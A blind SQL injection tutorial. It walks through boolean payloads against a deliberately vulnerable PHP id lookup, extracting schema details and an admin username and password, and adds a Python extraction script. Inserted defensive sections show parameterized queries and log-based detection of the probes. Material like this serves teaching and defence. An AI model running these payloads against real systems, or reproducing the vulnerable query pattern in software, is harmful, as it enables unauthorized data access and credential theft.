
Blind SQL Injection

VLD

Admin

Blind SQL injection is used when no value from the database appears in the web application's output: the server shows no information about the database, and all we can check is whether the injection evaluates to true or false.

In this example script the server checks whether the user id exists in the database: if the id exists it returns 'OK', otherwise it returns 'None'.

Code:
<?php
    if (isset($_GET['id'])) {
        $id = $_GET['id'];
        // $id goes straight into the query string: this is the injection point
        $sql = "SELECT * FROM `users` WHERE `id`='$id'";
        $user = mysqli_query($con, $sql);
        if (@mysqli_num_rows($user) > 0) {
            echo 'OK';
        } else {
            echo 'None';
        }
    }
?>
If there are 10 users in the database, the site's output will be:
Code:
http://www.sql-blind-injection.com/?id=1
OK
http://www.sql-blind-injection.com/?id=2
OK
http://www.sql-blind-injection.com/?id=3
OK
http://www.sql-blind-injection.com/?id=5
OK
http://www.sql-blind-injection.com/?id=10
OK
http://www.sql-blind-injection.com/?id=11
None
http://www.sql-blind-injection.com/?id=0
None
This means that only ids between 1 and 10 return true.

Exploitation

The site only returns true or false, so we have to brute-force; matching the whole string at once takes far too long, so we will match one character at a time.

Understanding the Query

The query uses the integer value of the id variable from the GET method; the possible queries are:
Code:
SELECT * FROM table_name WHERE id=1
SELECT * FROM table_name WHERE id='1'
SELECT * FROM table_name WHERE id="1"
SELECT * FROM table_name WHERE id=(1)
SELECT * FROM table_name WHERE id=('1')
SELECT * FROM table_name WHERE id=("1")
If the server's query is SELECT * FROM table_name WHERE `id`='1', the injection will be:
Code:
URL: http://www.sql-blind-injection.com/?id=1' AND TRUE#
Injection: 1' AND TRUE#
Query: SELECT * FROM table_name WHERE `id`='1' AND TRUE#'
Output: OK

URL: http://www.sql-blind-injection.com/?id=1' AND FALSE#
Injection: 1' AND FALSE#
Query: SELECT * FROM table_name WHERE `id`='1' AND FALSE#'
Output: None
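As an added illustration (not part of the original post), here is the same id lookup written twice in Python against an in-memory SQLite table: once with the page's string concatenation, once with a bound parameter, plus a stricter variant that enforces the integer contract before the database is touched. The sample rows, the function names and the use of SQLite are my assumptions; SQLite's comment marker is `--` rather than MySQL's `#`, so the page's true/false pair is adapted to `1=1`/`1=0` with a `--` comment.

```python
import sqlite3

# Constructed in-memory stand-in for the tutorial's `users` table (sample rows, not the page's data).
def build_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT)")
    con.executemany("INSERT INTO users (id, name) VALUES (?, ?)",
                    [(i, f"user{i}") for i in range(1, 11)])
    return con

def lookup_vulnerable(con, user_id):
    """Mirrors the page's PHP: the parameter is spliced into the SQL text, so a quote
    inside it changes the structure of the query."""
    sql = f"SELECT * FROM users WHERE id='{user_id}'"
    return "OK" if con.execute(sql).fetchone() else "None"

def lookup_safe(con, user_id):
    """Hardened form: the value is bound as a parameter and is never parsed as SQL."""
    sql = "SELECT * FROM users WHERE id=?"
    return "OK" if con.execute(sql, (user_id,)).fetchone() else "None"

def lookup_strict(con, user_id):
    """Defence in depth: id is an integer by contract, so reject anything else before
    the database sees it (this is also the natural place to log and alert on bad input)."""
    if not (isinstance(user_id, str) and user_id.isdigit()):
        return "None"
    return lookup_safe(con, int(user_id))

def demo():
    """Run the page's true/false pair through both implementations and return the outputs.
    SQLite comments start with '--', not MySQL's '#', so the probes are adapted."""
    con = build_db()
    true_probe = "1' AND 1=1 -- "
    false_probe = "1' AND 1=0 -- "
    return {
        "vuln_true": lookup_vulnerable(con, true_probe),    # "OK"   : structure changed, condition true
        "vuln_false": lookup_vulnerable(con, false_probe),  # "None" : structure changed, condition false
        "safe_true": lookup_safe(con, true_probe),          # "None" : whole string compared as an id
        "safe_false": lookup_safe(con, false_probe),        # "None" : same answer, no true/false channel
        "safe_legit": lookup_safe(con, "1"),                # "OK"
        "strict_probe": lookup_strict(con, true_probe),     # "None" : rejected before any query runs
        "strict_legit": lookup_strict(con, "7"),            # "OK"
        "strict_missing": lookup_strict(con, "11"),         # "None" : valid shape, no such row
    }

if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key:15} {value}")
```

The point of the contrast is that the hardened version does not try to escape the quote: with a bound parameter the oracle disappears because both probes produce the same answer as any other non-existent id, so there is nothing left for the character-by-character guessing described below to measure.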
Getting the Database

Getting the length of the database name

The LENGTH() function returns the length of a string inside an SQL query.
Code:
Injection: 1' AND (SELECT LENGTH(database()))=1#
Query: SELECT * FROM table_name WHERE `id`='1' AND (SELECT LENGTH(database()))=1#'
Output: None

Injection: 1' AND (SELECT LENGTH(database()))=2#
Query: SELECT * FROM table_name WHERE `id`='1' AND (SELECT LENGTH(database()))=2#'
Output: None

Injection: 1' AND (SELECT LENGTH(database()))=3#
Query: SELECT * FROM table_name WHERE `id`='1' AND (SELECT LENGTH(database()))=3#'
Output: None

Injection: 1' AND (SELECT LENGTH(database()))=4#
Query: SELECT * FROM table_name WHERE `id`='1' AND (SELECT LENGTH(database()))=4#'
Output: OK
This means the database name is 4 characters long.

Getting the database name

There are several ways to get the value of each character in a string. Here are a few methods:

SUBSTRING() & ASCII()

SUBSTRING() is used to extract characters from a string
Code:
SUBSTRING('Hacker', 1, 1)
Return: H
SUBSTRING('Hacker', 2, 1)
Return: a
SUBSTRING('Hacker', 3, 1)
Return: c
SUBSTRING('Hacker', 4, 1)
Return: k
SUBSTRING('Hacker', 5, 1)
Return: e
SUBSTRING('Hacker', 6, 1)
Return: r
ASCII() returns the ASCII value of a character
Code:
ASCII('a')
Return: 97
Code:
// Getting first char
Injection: 1' AND (SELECT ASCII(SUBSTRING(database(), 1, 1)))>=97#
Query: SELECT * FROM table_name WHERE `id`='1' AND (SELECT ASCII(SUBSTRING(database(), 1, 1)))>=97#'
Return: OK
// So we know that ASCII value of the first char is greater than or equal to 97 (a) so let's try another letter like 'o' (111)

Injection: 1' AND (SELECT ASCII(SUBSTRING(database(), 1, 1)))>=111#
Query: SELECT * FROM table_name WHERE `id`='1' AND (SELECT ASCII(SUBSTRING(database(), 1, 1)))>=111#'
Return: OK
// Returns OK again so let's increase to 116 (t)

Injection: 1' AND (SELECT ASCII(SUBSTRING(database(), 1, 1)))>=116#
Query: SELECT * FROM table_name WHERE `id`='1' AND (SELECT ASCII(SUBSTRING(database(), 1, 1)))>=116#'
Return: None
// Returns None, it means that the value must be decreased, let's try 115 (s)

Injection: 1' AND (SELECT ASCII(SUBSTRING(database(), 1, 1)))>=115#
Query: SELECT * FROM table_name WHERE `id`='1' AND (SELECT ASCII(SUBSTRING(database(), 1, 1)))>=115#'
Return: OK
// Returns OK that means that 115 is the correct value
Now we know that the first character of the database name is 's'; let's find the other characters.
Code:
// Getting second char
Injection: 1' AND (SELECT ASCII(SUBSTRING(database(), 2, 1)))>=97#
Query: SELECT * FROM table_name WHERE `id`='1' AND (SELECT ASCII(SUBSTRING(database(), 2, 1)))>=97#'
Return: OK

Injection: 1' AND (SELECT ASCII(SUBSTRING(database(), 2, 1)))>=114#
Query: SELECT * FROM table_name WHERE `id`='1' AND (SELECT ASCII(SUBSTRING(database(), 2, 1)))>=114#'
Return: None

Injection: 1' AND (SELECT ASCII(SUBSTRING(database(), 2, 1)))=113#
Query: SELECT * FROM table_name WHERE `id`='1' AND (SELECT ASCII(SUBSTRING(database(), 2, 1)))=113#'
Return: OK
The second character is 'q' (113)

Other characters
Code:
// 3rd char
Injection: 1' AND (SELECT ASCII(SUBSTRING(database(), 3, 1)))=108#
Query: SELECT * FROM table_name WHERE `id`='1' AND (SELECT ASCII(SUBSTRING(database(), 3, 1)))=108#'
Return: OK
// Third char is 'l' (108)

// 4th char
Injection: 1' AND (SELECT ASCII(SUBSTRING(database(), 4, 1)))=105#
Query: SELECT * FROM table_name WHERE `id`='1' AND (SELECT ASCII(SUBSTRING(database(), 4, 1)))=105#'
Return: OK
// Fourth char is 'i' (105)
The database name is 'sqli'. Let's try another method.

LIKE

The LIKE operator is used to search for a given pattern in a column. You can find out data in a string using '%'. The '%' sign is used as a wildcard (for the missing letters).
Code:
// Returns OK for any database name
Injection: 1' AND (SELECT database()) LIKE '%'#
Query: SELECT * FROM table_name WHERE `id`='1' AND (SELECT database()) LIKE '%'#'
Return: OK

// Returns OK if the database name starts with the letter 'a'
Injection: 1' AND (SELECT database()) LIKE 'a%'#
Query: SELECT * FROM table_name WHERE `id`='1' AND (SELECT database()) LIKE 'a%'#'
Return: None

// Returns OK if the database name starts with the letter 's'
Injection: 1' AND (SELECT database()) LIKE 's%'#
Query: SELECT * FROM table_name WHERE `id`='1' AND (SELECT database()) LIKE 's%'#'
Return: OK

// Returns OK if the database name starts with the letters 'sq'
Injection: 1' AND (SELECT database()) LIKE 'sq%'#
Query: SELECT * FROM table_name WHERE `id`='1' AND (SELECT database()) LIKE 'sq%'#'
Return: OK

// Returns OK if the database name starts with the letters 'sql'
Injection: 1' AND (SELECT database()) LIKE 'sql%'#
Query: SELECT * FROM table_name WHERE `id`='1' AND (SELECT database()) LIKE 'sql%'#'
Return: OK

// Returns OK if the database name is 'sqli'
Injection: 1' AND (SELECT database()) LIKE 'sqli'#
Query: SELECT * FROM table_name WHERE `id`='1' AND (SELECT database()) LIKE 'sqli'#'
Return: OK
LIKE is case-insensitive; for a case-sensitive check, BINARY is needed before database()
Code:
Injection: 1' AND (SELECT database()) LIKE 'SQLI'#
Query: SELECT * FROM table_name WHERE `id`='1' AND (SELECT database()) LIKE 'SQLI'#'
Return: OK

Injection: 1' AND (SELECT BINARY database()) LIKE 'SQLI'#
Query: SELECT * FROM table_name WHERE `id`='1' AND (SELECT BINARY database()) LIKE 'SQLI'#'
Return: None

Injection: 1' AND (SELECT BINARY database()) LIKE 'sqli'#
Query: SELECT * FROM table_name WHERE `id`='1' AND (SELECT BINARY database()) LIKE 'sqli'#'
Return: OK
Getting Tables

Getting the number of tables

To count the number of tables you can use the COUNT() function.
Code:
SELECT COUNT(*) FROM information_schema.tables WHERE table_schema=database()
or
Code:
SELECT COUNT(*) FROM information_schema.tables WHERE table_schema='sqli'
Code:
Injection: 1' AND (SELECT COUNT(*) FROM information_schema.tables WHERE table_schema=database())=1#
Query: SELECT * FROM table_name WHERE `id`='1' AND (SELECT COUNT(*) FROM information_schema.tables WHERE table_schema=database())=1#'
Return: None

Injection: 1' AND (SELECT COUNT(*) FROM information_schema.tables WHERE table_schema=database())=2#
Query: SELECT * FROM table_name WHERE `id`='1' AND (SELECT COUNT(*) FROM information_schema.tables WHERE table_schema=database())=2#'
Return: OK
There are 2 tables in the database.

Getting the names of all tables

To select each table individually we will use LIMIT.
Code:
SELECT * FROM table_name LIMIT 0,1
// Select only the first row

SELECT * FROM table_name LIMIT 1,1
// Select only the second row

SELECT * FROM table_name LIMIT 0,2
// Select the first and second rows

SELECT * FROM table_name LIMIT 1,2
// Select the second and third rows
Getting the length of each table name
Code:
// First table
Injection: 1' AND (SELECT LENGTH(table_name) FROM information_schema.tables WHERE table_schema=database() LIMIT 0,1)=5#
Query: SELECT * FROM table_name WHERE `id`='1' AND (SELECT LENGTH(table_name) FROM information_schema.tables WHERE table_schema=database() LIMIT 0,1)=5#'
Return: OK
// The length of the first table name is 5

// Second table
Injection: 1' AND (SELECT LENGTH(table_name) FROM information_schema.tables WHERE table_schema=database() LIMIT 1,1)=5#
Query: SELECT * FROM table_name WHERE `id`='1' AND (SELECT LENGTH(table_name) FROM information_schema.tables WHERE table_schema=database() LIMIT 1,1)=5#'
Return: OK
// The length of the second table name is 5
In this example the method for getting the table names is the same LIKE approach, but you can use SUBSTRING() instead.

Getting the name of the first table
Code:
Injection: 1' AND (SELECT table_name FROM information_schema.tables WHERE table_schema=database() LIMIT 0,1) LIKE 'a%'#
Query: SELECT * FROM table_name WHERE `id`='1' AND (SELECT table_name FROM information_schema.tables WHERE table_schema=database() LIMIT 0,1) LIKE 'a%'#'
Return: None
// This table name doesn't start with 'a'

Injection: 1' AND (SELECT table_name FROM information_schema.tables WHERE table_schema=database() LIMIT 0,1) LIKE 'u%'#
Query: SELECT * FROM table_name WHERE `id`='1' AND (SELECT table_name FROM information_schema.tables WHERE table_schema=database() LIMIT 0,1) LIKE 'u%'#'
Return: OK
// The first table name starts with 'u' and its length is 5, let's try 'users'

Injection: 1' AND (SELECT table_name FROM information_schema.tables WHERE table_schema=database() LIMIT 0,1) LIKE 'users'#
Query: SELECT * FROM table_name WHERE `id`='1' AND (SELECT table_name FROM information_schema.tables WHERE table_schema=database() LIMIT 0,1) LIKE 'users'#'
Return: OK
// The first table name is 'users'
Getting the name of the second table
Code:
Injection: 1' AND (SELECT table_name FROM information_schema.tables WHERE table_schema=database() LIMIT 1,1) LIKE 'a%'#
Query: SELECT * FROM table_name WHERE `id`='1' AND (SELECT table_name FROM information_schema.tables WHERE table_schema=database() LIMIT 1,1) LIKE 'a%'#'
Return: OK
// The second table name starts with 'a' and its length is 5, let's try 'admin'

Injection: 1' AND (SELECT table_name FROM information_schema.tables WHERE table_schema=database() LIMIT 1,1) LIKE 'admin'#
Query: SELECT * FROM table_name WHERE `id`='1' AND (SELECT table_name FROM information_schema.tables WHERE table_schema=database() LIMIT 1,1) LIKE 'admin'#'
Return: OK
// The second table name is 'admin'
The admin table probably contains important data.

Getting Columns

Getting the number of columns
Code:
Injection: 1' AND (SELECT COUNT(column_name) FROM information_schema.columns WHERE table_schema=database() AND table_name='admin')=1#
Query: SELECT * FROM table_name WHERE `id`='1' AND (SELECT COUNT(column_name) FROM information_schema.columns WHERE table_schema=database() AND table_name='admin')=1#'
Return: None

Injection: 1' AND (SELECT COUNT(column_name) FROM information_schema.columns WHERE table_schema=database() AND table_name='admin')=2#
Query: SELECT * FROM table_name WHERE `id`='1' AND (SELECT COUNT(column_name) FROM information_schema.columns WHERE table_schema=database() AND table_name='admin')=2#'
Return: None

Injection: 1' AND (SELECT COUNT(column_name) FROM information_schema.columns WHERE table_schema=database() AND table_name='admin')=3#
Query: SELECT * FROM table_name WHERE `id`='1' AND (SELECT COUNT(column_name) FROM information_schema.columns WHERE table_schema=database() AND table_name='admin')=3#'
Return: OK
The table has 3 columns.
Getting the length of each column name

Use LIMIT to select each column individually and LENGTH() to check its length.

First column
Code:
Injection: 1' AND (SELECT LENGTH(column_name) FROM information_schema.columns WHERE table_schema=database() AND table_name='admin' LIMIT 0,1)=1#
Query: SELECT * FROM table_name WHERE `id`='1' AND (SELECT LENGTH(column_name) FROM information_schema.columns WHERE table_schema=database() AND table_name='admin' LIMIT 0,1)=1#'
Return: None

Injection: 1' AND (SELECT LENGTH(column_name) FROM information_schema.columns WHERE table_schema=database() AND table_name='admin' LIMIT 0,1)=2#
Query: SELECT * FROM table_name WHERE `id`='1' AND (SELECT LENGTH(column_name) FROM information_schema.columns WHERE table_schema=database() AND table_name='admin' LIMIT 0,1)=2#'
Return: OK
Second column
Code:
Injection: 1' AND (SELECT LENGTH(column_name) FROM information_schema.columns WHERE table_schema=database() AND table_name='admin' LIMIT 1,1)=1#
Query: SELECT * FROM table_name WHERE `id`='1' AND (SELECT LENGTH(column_name) FROM information_schema.columns WHERE table_schema=database() AND table_name='admin' LIMIT 1,1)=1#'
Return: None

Injection: 1' AND (SELECT LENGTH(column_name) FROM information_schema.columns WHERE table_schema=database() AND table_name='admin' LIMIT 1,1)=8#
Query: SELECT * FROM table_name WHERE `id`='1' AND (SELECT LENGTH(column_name) FROM information_schema.columns WHERE table_schema=database() AND table_name='admin' LIMIT 1,1)=8#'
Return: OK
Third column
Code:
Injection: 1' AND (SELECT LENGTH(column_name) FROM information_schema.columns WHERE table_schema=database() AND table_name='admin' LIMIT 2,1)=1#
Query: SELECT * FROM table_name WHERE `id`='1' AND (SELECT LENGTH(column_name) FROM information_schema.columns WHERE table_schema=database() AND table_name='admin' LIMIT 2,1)=1#'
Return: None

Injection: 1' AND (SELECT LENGTH(column_name) FROM information_schema.columns WHERE table_schema=database() AND table_name='admin' LIMIT 2,1)=8#
Query: SELECT * FROM table_name WHERE `id`='1' AND (SELECT LENGTH(column_name) FROM information_schema.columns WHERE table_schema=database() AND table_name='admin' LIMIT 2,1)=8#'
Return: OK
Getting the name of each column

First column (length = 2)
Code:
Injection: 1' AND (SELECT column_name FROM information_schema.columns WHERE table_schema=database() AND table_name='admin' LIMIT 0,1) LIKE 'a%'#
Query: SELECT * FROM table_name WHERE `id`='1' AND (SELECT column_name FROM information_schema.columns WHERE table_schema=database() AND table_name='admin' LIMIT 0,1) LIKE 'a%'#'
Return: None

Injection: 1' AND (SELECT column_name FROM information_schema.columns WHERE table_schema=database() AND table_name='admin' LIMIT 0,1) LIKE 'i%'#
Query: SELECT * FROM table_name WHERE `id`='1' AND (SELECT column_name FROM information_schema.columns WHERE table_schema=database() AND table_name='admin' LIMIT 0,1) LIKE 'i%'#'
Return: OK

Injection: 1' AND (SELECT column_name FROM information_schema.columns WHERE table_schema=database() AND table_name='admin' LIMIT 0,1) LIKE 'id'#
Query: SELECT * FROM table_name WHERE `id`='1' AND (SELECT column_name FROM information_schema.columns WHERE table_schema=database() AND table_name='admin' LIMIT 0,1) LIKE 'id'#'
Return: OK
Second column (length = 8)
Code:
Injection: 1' AND (SELECT column_name FROM information_schema.columns WHERE table_schema=database() AND table_name='admin' LIMIT 1,1) LIKE 'a%'#
Query: SELECT * FROM table_name WHERE `id`='1' AND (SELECT column_name FROM information_schema.columns WHERE table_schema=database() AND table_name='admin' LIMIT 1,1) LIKE 'a%'#'
Return: None

Injection: 1' AND (SELECT column_name FROM information_schema.columns WHERE table_schema=database() AND table_name='admin' LIMIT 1,1) LIKE 'u%'#
Query: SELECT * FROM table_name WHERE `id`='1' AND (SELECT column_name FROM information_schema.columns WHERE table_schema=database() AND table_name='admin' LIMIT 1,1) LIKE 'u%'#'
Return: OK

Injection: 1' AND (SELECT column_name FROM information_schema.columns WHERE table_schema=database() AND table_name='admin' LIMIT 1,1) LIKE 'us%'#
Query: SELECT * FROM table_name WHERE `id`='1' AND (SELECT column_name FROM information_schema.columns WHERE table_schema=database() AND table_name='admin' LIMIT 1,1) LIKE 'us%'#'
Return: OK

Injection: 1' AND (SELECT column_name FROM information_schema.columns WHERE table_schema=database() AND table_name='admin' LIMIT 1,1) LIKE 'username'#
Query: SELECT * FROM table_name WHERE `id`='1' AND (SELECT column_name FROM information_schema.columns WHERE table_schema=database() AND table_name='admin' LIMIT 1,1) LIKE 'username'#'
Return: OK
Third column (length = 8)
Code:
Injection: 1' AND (SELECT column_name FROM information_schema.columns WHERE table_schema=database() AND table_name='admin' LIMIT 2,1) LIKE 'a%'#
Query: SELECT * FROM table_name WHERE `id`='1' AND (SELECT column_name FROM information_schema.columns WHERE table_schema=database() AND table_name='admin' LIMIT 2,1) LIKE 'a%'#'
Return: None

Injection: 1' AND (SELECT column_name FROM information_schema.columns WHERE table_schema=database() AND table_name='admin' LIMIT 2,1) LIKE 'p%'#
Query: SELECT * FROM table_name WHERE `id`='1' AND (SELECT column_name FROM information_schema.columns WHERE table_schema=database() AND table_name='admin' LIMIT 2,1) LIKE 'p%'#'
Return: OK

Injection: 1' AND (SELECT column_name FROM information_schema.columns WHERE table_schema=database() AND table_name='admin' LIMIT 2,1) LIKE 'pa%'#
Query: SELECT * FROM table_name WHERE `id`='1' AND (SELECT column_name FROM information_schema.columns WHERE table_schema=database() AND table_name='admin' LIMIT 2,1) LIKE 'pa%'#'
Return: OK

Injection: 1' AND (SELECT column_name FROM information_schema.columns WHERE table_schema=database() AND table_name='admin' LIMIT 2,1) LIKE 'password'#
Query: SELECT * FROM table_name WHERE `id`='1' AND (SELECT column_name FROM information_schema.columns WHERE table_schema=database() AND table_name='admin' LIMIT 2,1) LIKE 'password'#'
Return: OK
Getting the Username and Password

Database
  • sqli
    • users
    • admin
      • id
      • username
      • password

Getting the username length
Code:
Injection: 1' AND (SELECT LENGTH(username) FROM admin LIMIT 1)=1#
Query: SELECT * FROM table_name WHERE `id`='1' AND (SELECT LENGTH(username) FROM admin LIMIT 1)=1#'
Return: None

Injection: 1' AND (SELECT LENGTH(username) FROM admin LIMIT 1)=2#
Query: SELECT * FROM table_name WHERE `id`='1' AND (SELECT LENGTH(username) FROM admin LIMIT 1)=2#'
Return: None

Injection: 1' AND (SELECT LENGTH(username) FROM admin LIMIT 1)=3#
Query: SELECT * FROM table_name WHERE `id`='1' AND (SELECT LENGTH(username) FROM admin LIMIT 1)=3#'
Return: None

Injection: 1' AND (SELECT LENGTH(username) FROM admin LIMIT 1)=4#
Query: SELECT * FROM table_name WHERE `id`='1' AND (SELECT LENGTH(username) FROM admin LIMIT 1)=4#'
Return: None

Injection: 1' AND (SELECT LENGTH(username) FROM admin LIMIT 1)=5#
Query: SELECT * FROM table_name WHERE `id`='1' AND (SELECT LENGTH(username) FROM admin LIMIT 1)=5#'
Return: OK
Getting the password length
Code:
Injection: 1' AND (SELECT LENGTH(password) FROM admin LIMIT 1)=1#
Query: SELECT * FROM table_name WHERE `id`='1' AND (SELECT LENGTH(password) FROM admin LIMIT 1)=1#'
Return: None

Injection: 1' AND (SELECT LENGTH(password) FROM admin LIMIT 1)=2#
Query: SELECT * FROM table_name WHERE `id`='1' AND (SELECT LENGTH(password) FROM admin LIMIT 1)=2#'
Return: None

Injection: 1' AND (SELECT LENGTH(password) FROM admin LIMIT 1)=3#
Query: SELECT * FROM table_name WHERE `id`='1' AND (SELECT LENGTH(password) FROM admin LIMIT 1)=3#'
Return: None

Injection: 1' AND (SELECT LENGTH(password) FROM admin LIMIT 1)=4#
Query: SELECT * FROM table_name WHERE `id`='1' AND (SELECT LENGTH(password) FROM admin LIMIT 1)=4#'
Return: None

Injection: 1' AND (SELECT LENGTH(password) FROM admin LIMIT 1)=8#
Query: SELECT * FROM table_name WHERE `id`='1' AND (SELECT LENGTH(password) FROM admin LIMIT 1)=8#'
Return: OK
Getting the username (length = 5)
Code:
Injection: 1' AND (SELECT username FROM admin LIMIT 1) LIKE 'a%'#
Query: SELECT * FROM table_name WHERE `id`='1' AND (SELECT username FROM admin LIMIT 1) LIKE 'a%'#'
Return: OK

Injection: 1' AND (SELECT username FROM admin LIMIT 1) LIKE 'admin'#
Query: SELECT * FROM table_name WHERE `id`='1' AND (SELECT username FROM admin LIMIT 1) LIKE 'admin'#'
Return: OK
Getting the password (length = 8)
Code:
Injection: 1' AND (SELECT password FROM admin LIMIT 1) LIKE 'a%'#
Query: SELECT * FROM table_name WHERE `id`='1' AND (SELECT password FROM admin LIMIT 1) LIKE 'a%'#'
Return: None

Injection: 1' AND (SELECT password FROM admin LIMIT 1) LIKE 'p%'#
Query: SELECT * FROM table_name WHERE `id`='1' AND (SELECT password FROM admin LIMIT 1) LIKE 'p%'#'
Return: OK

Injection: 1' AND (SELECT password FROM admin LIMIT 1) LIKE 'pa%'#
Query: SELECT * FROM table_name WHERE `id`='1' AND (SELECT password FROM admin LIMIT 1) LIKE 'pa%'#'
Return: None

Injection: 1' AND (SELECT password FROM admin LIMIT 1) LIKE 'p4%'#
Query: SELECT * FROM table_name WHERE `id`='1' AND (SELECT password FROM admin LIMIT 1) LIKE 'p4%'#'
Return: OK

Injection: 1' AND (SELECT password FROM admin LIMIT 1) LIKE 'p455%'#
Query: SELECT * FROM table_name WHERE `id`='1' AND (SELECT password FROM admin LIMIT 1) LIKE 'p455%'#'
Return: OK

Injection: 1' AND (SELECT password FROM admin LIMIT 1) LIKE 'p455word'#
Query: SELECT * FROM table_name WHERE `id`='1' AND (SELECT password FROM admin LIMIT 1) LIKE 'p455word'#'
Return: None

Injection: 1' AND (SELECT password FROM admin LIMIT 1) LIKE 'p455w0rd'#
Query: SELECT * FROM table_name WHERE `id`='1' AND (SELECT password FROM admin LIMIT 1) LIKE 'p455w0rd'#'
Return: OK
Now we know the username/password for admin:
Code:
admin:p455w0rd
Additional

Creating a Script to Get the Values

This script gets the database name, but the code can be adapted to get other values.
Code:
import requests

url = 'http://www.sql-blind-injection.com'
keyword = 'OK'

#    Getting the length of database
for i in xrange(1, 100):
    injection = "?id=1' AND (SELECT LENGTH(database()))=" + str(i) + "%23"
    if requests.get(url + injection).content.find(keyword) != -1:
        length = i
        break

#    Getting the name of database
charset = 'abcdefghijklmnopqrstuvwxyz0123456789'
database = ''
for n in xrange(1, length + 1):
    for c in charset:
        injection = "?id=1' AND (SELECT SUBSTRING(database(), " + str(n) + ", 1))='" + c + "'%23"
        if requests.get(url + injection).content.find(keyword) != -1:
            database += c
            break
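Added example, not from the original post: what the probes shown in this tutorial look like in a web server's access log, and how a defender can pick them out and attribute them to a client. The log lines, IP addresses and indicator names are constructed for the illustration; the indicators themselves are taken from the requests above (database(), LENGTH/SUBSTRING/ASCII, information_schema, and a quote followed by AND/OR and a # or -- comment), URL-decoded before matching because the script above sends them percent-encoded.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# Constructed combined-format access-log sample (not real traffic). The first client sends
# requests shaped like the tutorial's probes; the second is ordinary browsing.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /?id=1 HTTP/1.1" 200 2
203.0.113.5 - - [10/Oct/2023:13:55:37 +0000] "GET /?id=1%27%20AND%20(SELECT%20LENGTH(database()))=1%23 HTTP/1.1" 200 4
203.0.113.5 - - [10/Oct/2023:13:55:37 +0000] "GET /?id=1%27%20AND%20(SELECT%20LENGTH(database()))=2%23 HTTP/1.1" 200 4
203.0.113.5 - - [10/Oct/2023:13:55:38 +0000] "GET /?id=1%27%20AND%20(SELECT%20ASCII(SUBSTRING(database(),%201,%201)))%3E=97%23 HTTP/1.1" 200 2
203.0.113.5 - - [10/Oct/2023:13:55:39 +0000] "GET /?id=1%27%20AND%20(SELECT%20COUNT(*)%20FROM%20information_schema.tables%20WHERE%20table_schema=database())=2%23 HTTP/1.1" 200 2
198.51.100.7 - - [10/Oct/2023:13:56:01 +0000] "GET /?id=3 HTTP/1.1" 200 2
198.51.100.7 - - [10/Oct/2023:13:56:02 +0000] "GET /?id=4 HTTP/1.1" 200 2
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+)'
)

# Indicators taken from the probes shown in the tutorial; the labels are my own.
PROBE_PATTERNS = [
    ("db_function", re.compile(r"\bdatabase\(\)", re.I)),
    ("inferential_function", re.compile(r"\b(length|substring|ascii)\s*\(", re.I)),
    ("schema_catalogue", re.compile(r"\binformation_schema\.", re.I)),
    ("quote_boolean_comment", re.compile(r"'\s*(and|or)\b.*(#|--)", re.I)),
]

def parse_line(line):
    """Parse one combined-format line; returns a dict with the URL-decoded path, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["decoded_path"] = unquote_plus(rec["path"])
    return rec

def probe_indicators(decoded_path):
    """Names of the indicator patterns that match a decoded request path (empty for benign)."""
    return [name for name, pat in PROBE_PATTERNS if pat.search(decoded_path)]

def analyse(log_text):
    """Flag individual probe requests and count them per client IP."""
    flagged = []
    per_ip = Counter()
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        hits = probe_indicators(rec["decoded_path"])
        if hits:
            flagged.append((rec["ip"], rec["decoded_path"], hits))
            per_ip[rec["ip"]] += 1
    return flagged, per_ip

def suspicious_clients(per_ip, threshold=3):
    """Clients whose probe count reaches the threshold: candidates for rate limiting or blocking.
    Boolean-based extraction needs many requests per recovered character, so volume from one
    client against one parameter is the strong signal even when individual payloads are obfuscated."""
    return sorted(ip for ip, n in per_ip.items() if n >= threshold)

if __name__ == "__main__":
    flagged, per_ip = analyse(SAMPLE_LOG)
    for ip, path, hits in flagged:
        print(ip, path, hits)
    print("suspicious:", suspicious_clients(per_ip))
```

Pattern matching on its own is only a first signal; the shape of the traffic (hundreds of requests from one client that differ only in a number or a letter, all hitting the same parameter) is what distinguishes this technique in a real log, which is why the per-client counter is kept alongside the indicator list.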
 